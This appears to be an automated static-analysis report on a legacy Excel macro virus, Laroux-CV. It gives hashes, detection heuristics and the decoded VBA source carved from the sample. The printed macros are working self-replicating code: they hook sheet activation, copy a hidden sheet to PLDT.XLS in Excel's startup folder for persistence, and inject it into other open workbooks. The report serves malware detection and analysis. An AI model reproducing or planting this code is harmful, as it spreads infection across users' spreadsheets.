Xls.Trojan.Laroux-28 — Office (OLE) malware analysis

Static analysis result for SHA-256 b684ca4b2ed17dbe…

MALICIOUS

Office (OLE)

231.5 KB Created: 1999-12-16 05:06:57 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 80de160d59326399b21481b0e88fe660 SHA-1: bb96513b7c94dd238a9b4b608705a7d588cdb597 SHA-256: b684ca4b2ed17dbe6c472a29a8e3b8c2828075b0a24f20aba6e7d639908086d2
240 Risk Score

Malware Insights

Xls.Trojan.Laroux-28 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file is identified as a malicious Excel 5 macro virus (Laroux-CV) by multiple critical heuristics. The auto_open macro executes a check_files subroutine which attempts to save a copy of itself as 'PLDT.XLS' in the application's startup path, indicating an attempt to establish persistence. The macro also manipulates sheet visibility and workbook properties, common behaviors for this type of malware.

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-28 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-28
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10204 bytes
SHA-256: 926cadb6aae7f7ed5a8fb38f26fa0fbe0f6776c0e8951592800c8297a2eab986
Detection
ClamAV: Xls.Trojan.Laroux-28
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "pldt"


Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    
    Application.OnSheetActivate = "check_files"

'    wbook$ = ActiveWorkbook.Name
'    If wbook$ = "4300 Rack" Then
'        Workbooks(wbook$).Calculation = xlManual
'    Else
'    End If


End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "PLDT.XLS")
    If m$ = "PLDT.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    Sheets("pldt").Visible = True
    Sheets("pldt").Select
    Sheets("pldt").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.Name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs Filename:=Application.StartupPath & "/" & "PLDT.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("pldt").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "PLDT.XLS!check_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).Name
    If s$ <> "pldt" Then
        Workbooks("PLDT.XLS").Sheets("pldt").Copy before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("pldt").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "PLDT.XLS!check_files"
    Case Else
End Select
End Sub

Function Chkdgt(ByVal acctnbr As String) As Variant

Dim fstnine As String
Dim m As Integer
Dim totalnumtoadd As String
Dim f As Integer
Dim chkdigcalc As Integer
'********************************
'Check Digit Calculation
'********************************
fstnine = Left$(acctnbr, 9)
For m = 1 To 9
    Select Case m
        Case 1, 3, 5, 7, 9
            totalnumtoadd = totalnumtoadd & Format$(Val(Mid$(fstnine, m, 1)) * 2, "00")
        Case 2, 4, 6, 8
            totalnumtoadd = totalnumtoadd & Mid$(fstnine, m, 1)
    End Select
Next m
For f = 1 To Len(totalnumtoadd)
    chkdigcalc = chkdigcalc + Val(Mid$(totalnumtoadd, f, 1))
Next f
chkdigcalc = 100 - chkdigcalc
'*********************************
Chkdgt = Left(acctnbr, 3) & "-" & Mid(acctnbr, 4, 5) & "-" & Right(acctnbr, 1) & "-" & Right$(chkdigcalc, 1)

End Function



' Processing file: /opt/analyzer/scan_staging/7cc073ea9bea47c7bd2aa2b0fa0f30a2.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/pldt - 5177 bytes
' Line #0:
' Line #1:
' Line #2:
' 	FuncDefn (Sub auto_open())
' Line #3:
' Line #4:
' 	LitStr 0x000B "check_files"
' 	Ld Application 
' 	MemSt OnSheetActivate 
' Line #5:
' Line #6:
' 	QuoteRem 0x0000 0x0020 "    wbook$ = ActiveWorkbook.Name"
' Line #7:
' 	QuoteRem 0x0000 0x0020 "    If wbook$ = "4300 Rack" Then"
' Line #8:
' 	QuoteRem 0x0000 0x0030 "        Workbooks(wbook$).Calculation = xlManual"
' Line #9:
' 	QuoteRem 0x0000 0x0008 "    Else"
' Line #10:
' 	QuoteRem 0x0000 0x000A "    End If"
' Line #11:
' Line #12:
' Line #13:
' 	EndSub 
' Line #14:
' Line #15:
' 	FuncDefn (Sub check_files())
' Line #16:
' 	Ld Application 
' 	MemLd StartupPath 
' 	St c$ 
' Line #17:
' 	Ld c$ 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	LitStr 0x0008 "PLDT.XLS"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	St m$ 
' Line #18:
' 	Ld m$ 
' 	LitStr 0x0008 "PLDT.XLS"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St p 
' 	Else 
' 	BoSImplicit 
' 	LitDI2 0x0000 
' 	St p 
' 	EndIf 
' Line #19:
' 	Ld ActiveWor
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.